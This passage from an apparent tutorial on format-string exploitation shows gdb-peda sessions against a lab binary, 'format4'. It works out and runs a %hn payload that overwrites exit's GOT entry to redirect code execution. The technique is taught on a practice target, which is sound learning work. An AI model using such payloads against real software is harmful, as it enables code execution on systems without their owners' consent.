0012| 0xbffff47c --> 0x8048508 (<vuln+15>:	add    ebx,0x1388)
0016| 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
0020| 0xbffff484 ("%4$n\n")
0024| 0xbffff488 --> 0xbfff000a --> 0x0 
0028| 0xbffff48c --> 0xb7fdec83 (<dl_main+8355>:	rdtsc)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048538 in vuln ()
gdb-peda$ x/x 0x080498ac ; Check the current value
0x80498ac:	0x080483a6
gdb-peda$ n ; Then step to pass printf()
??

[----------------------------------registers-----------------------------------]
EAX: 0x5 
EBX: 0x8049890 --> 0x80497a0 --> 0x1 
ECX: 0x400 
EDX: 0xb7fcc870 --> 0x0 
ESI: 0x1 
EDI: 0xb7fcb000 --> 0x1b2db0 
EBP: 0xbffff688 --> 0xbffff698 --> 0x0 
ESP: 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x4 
EIP: 0x804853d (<vuln+68>:	add    esp,0x10)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048531 <vuln+56>:	lea    eax,[ebp-0x208]
   0x8048537 <vuln+62>:	push   eax
   0x8048538 <vuln+63>:	call   0x8048360 <printf@plt>
=> 0x804853d <vuln+68>:	add    esp,0x10
   0x8048540 <vuln+71>:	sub    esp,0xc
   0x8048543 <vuln+74>:	push   0x1
   0x8048545 <vuln+76>:	call   0x80483a0 <exit@plt>
   0x804854a <main>:	lea    ecx,[esp+0x4]
[------------------------------------stack-------------------------------------]
0000| 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x4 
0004| 0xbffff474 --> 0x200 
0008| 0xbffff478 --> 0xb7fcb5a0 --> 0xfbad2088 
0012| 0xbffff47c --> 0x8048508 (<vuln+15>:	add    ebx,0x1388)
0016| 0xbffff480 --> 0x80498ac --> 0x4 
0020| 0xbffff484 ("%4$n\n")
0024| 0xbffff488 --> 0xbfff000a --> 0x0 
0028| 0xbffff48c --> 0xb7fdec83 (<dl_main+8355>:	rdtsc)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804853d in vuln ()
gdb-peda$ x/x 0x080498ac
0x80498ac:	0x00000004 ; New value, again, it's 4 because we only wrote the 4 bytes address

So, our exploit will look like that:

  • \xac\x98\x04\x08\xae\x98\x04\x08%<val1>x%4$hn%<val2>x%5$hn

We have to figure the value based on the fact that we need to write 080484cb:

  • Low order bytes = 84cb (33995 in decimal)
  • High order bytes = 0804 (2052 in decimal)

However, the high order bytes is inferior to the low order so, we’ll write the high order first! We just need to invert the addresses where we want to write! Let’s do some math:

  • High order bytes = 0804 (2052 in decimal). Minus the 8 bytes for the addresses = 2044
  • Low order bytes = 84cb (33995 in decimal). Minus the 2052 bytes we already wrote = 31943

Here is the result :

  • \xae\x98\x04\x08\xac\x98\x04\x08%2044x%4$hn%31943x%5$hn

Now, in GDB :

gdb-peda$ run < <(python -c 'print "\xae\x98\x04\x08\xac\x98\x04\x08%2044x%4$hn%31943x%5$hn"')
Starting program: /home/user/demo/format4 < <(python -c 'print "\xae\x98\x04\x08\xac\x98\x04\x08%2044x%4$hn%31943x%5$hn"')
??                                                                                                                                    
Code execution redirected !
[Inferior 1 (process 6884) exited with code 01]
Warning: not running or target is remote
gdb-peda$ 

You got it !

Conclusion

You made it ! Learning format strings exploitation is not an easy task but, try to do some wargames online. With a bit more practice, you will be able to solve them easily ;)

Resources